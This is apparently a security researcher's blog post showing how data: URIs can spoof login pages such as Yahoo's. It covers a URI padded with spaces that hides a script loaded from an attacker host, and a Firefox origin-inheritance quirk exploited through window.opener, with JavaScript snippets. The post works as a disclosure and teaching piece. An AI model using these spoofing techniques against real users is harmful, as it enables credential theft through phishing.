Dataurization of URLs for A More Effective Phishing Campaign

Phishing with data: URIs is not a new idea. The concept is relatively simple, taking advantage of many user’s inexperience with how data: URIs function in order to trick them into entering credentials into a phishing page. We’ve seen this in the wild against Gmail users for example, and we’ve even seen some cool attacks against Chrome with really long data: URIs. This post will explore how we can craft a data: URI to trick even more experienced users.

Before we start, for those new to the concept, data: URIs function like so:

data:[<MIME-type>][;charset=<encoding>][;base64],<data>

Basically, you can specify an entire file in the URI itself:

data:text/html,<h1>Neat!</h1>

You specify the MIME type, whether or not you want to use base64 encoding (for binary files) and of course the data you want to represent.

For example, if you right click this icon: you’ll see that the source of the image is a lengthy data URI:

data:image/vndmicrosofticon;base64,AAABAAEAEBAAAAAAIABoBAAAFgAAACgAAAAQAAAAIAAAAAEAIAAAAAAAQAQAAAAAAAAAAAAAAAAAAAAAAAD///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////AZWVlf91dXX/dXV1/3V1df91dXX/dXV1/3V1df91dXX/dXV1/5SUlP////8B////Af///wH///8B////Af///wF3d3f/d3d3/3d3d/93d3f/d3d3/3d3d/93d3f/d3d3/3d3d/93d3f/////Af///wH///8B////Af///wH///8Be3t7/3t7e/97e3v/e3t7/3t7e/97e3v/e3t7/3t7e/97e3v/e3t7/////wH///8B////Af///wH///8B////AX5+fv9+fn7/fn5+/35+fv9+fn7/fn5+/35+fv9+fn7/fn5+/35+fv////8B////Af///wH///8B////Af///wGCgoL/goKC/4KCgv+CgoL/goKC/4KCgv+CgoL/goKC/4KCgv+CgoL/////Af///wH///8B////Af///wH///8BhoaG/4aGhv+Ghob/hoaG/4aGhv+Ghob/hoaG/4aGhv+Ghob/hoaG/////wH///8B////Af///wH///8B////AaWlpf+Kior/ioqK/4qKiv+Kior/ioqK/4qKiv+Kior/ioqK/6Wlpf////8B////Af///wH///8B////Af///wH///8Bjo6O/46Ojv////8B////Af///wH///8Bjo6O/46Ojv////8B////Af///wH///8B////Af///wH///8B////AZeXl/+RkZH/////Af///wH///8B////AZGRkf+Wlpb/////Af///wH///8B////Af///wH///8B////Af///wG2trb/lJSU/7Kysv////8B////AbKysv+UlJT/tra2/////wH///8B////Af///wH///8B////Af///wH///8B7+/vI52dnf+Xl5f/l5eX/5eXl/+Xl5f/nZ2d/+/v7yP///8B////Af///wH///8B////Af///wH///8B////Af///wH///8Bubm5/56env+enp7/ubm5/////wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8B////Af///wH///8BAAD//wAA//8AAP//AAD//wAA//8AAP//AAD//wAA//8AAP//AAD//wAA//8AAP//AAD//wAA//8AAP//AAD//w==

It’s quite a versatile URI scheme.

Phishing With Data URIs

If you’re familiar with the data: URI format, it’s probably a fair assumption that you are either a developer or someone who is fairly knowledgable about the web in general. However, the same assumption couldn’t be made for most web users.

What would a casual web user say about the following URI? What website are they on?

The above URI looks to be https://login.yahoo.com/, but it’s actually just another data: URI (with https://login.yahoo.com/ just being some content). The full URI for the above is actually the following:

data:text/html,https://login.yahoo.com/[ LARGE AMOUNT OF SPACES ]<script src="http://attacker.hack/opener/mask.js"></script>

The trick, of course, is the trailing

For a better comparison, let’s view them side by side:

Upon close examination it doesn’t hold up very well, the user may notice something is amiss but they’ve been trained to inspect the “domain” portion, which appears to be correct.

For those unimpressed with the above phishing scheme, we can take it up a notch. In Firefox, for example, we can construct a page such as the following to phish unsuspecting users:

That looks quite a bit better doesn’t it? Let’s look at that a bit closer:

This data: URI is even more deceptive due to abuse of Firefox-specific functionality (read: probably a bug).

Unlike the previous URI phishing, the full above URI is just:

data:,//login.yahoo.com

No spacing trickery involved, but how?

This is made possible due to Firefox’s unique behavior when changing a window.opener.location reference to a data: URI. Instead of nulling the origin, the data: URI inherits the origin of the site that modifies the window.opener.location reference. So if a site such as “http://attacker.com/” sets window.opener.location to a data: URI, the new origin for the window.opener will be “http://attacker.com/”.

The scenario is laid out like this:

  1. User clicks on an “http://attacker.com/” link from a third party site “http://example.com/” and a new window/tab is opened.

  2. The newly opened “http://attacker.com/” page now has a window.opener reference to the “http://example.com/” window and can change the location of the window by executing the following JavaScript:

window.opener.location = "data:,<script>alert(document.domain)</script>";

Now the tab previously containing “http://example.com” has a URI of “data:,<script>alert(1)</script>”, and a JavaScript alert prompt is spawned showing the current domain is “attacker.com” despite being on a data: URI.

  1. Since both tabs now have the same origin (http://attacker.com/) they can modify each other’s DOM freely. So the newly opened tab could execute the following JavaScript without any same-origin policy restrictions:
window.opener.document.body.innerHTML = "<h1>Modified DOM</h1>";

Best of all the data: URI remains unchanged! So we can start off with a data URI like “data:,//login.yahoo.com/” and later modify the HTML to mimic the actually Yahoo login page!

This style of origin inheritance for data: URIs is specific only to Firefox. Chrome blocks data: URIs from performing any operations on frames/window.opener references with a generic “SecurityError”.

Proof of Concept

To demonstrate this method of phishing I’ve constructed a proof of concept for both Chrome and Firefox, please note that the credentials entered into these pages aren’t ever collected (but don’t take my word for it!):

Matthew Bryant (mandatory)

Matthew Bryant (mandatory)
Security researcher who needs to sleep more. Opinions expressed are solely my own and do not express the views or opinions of my employer.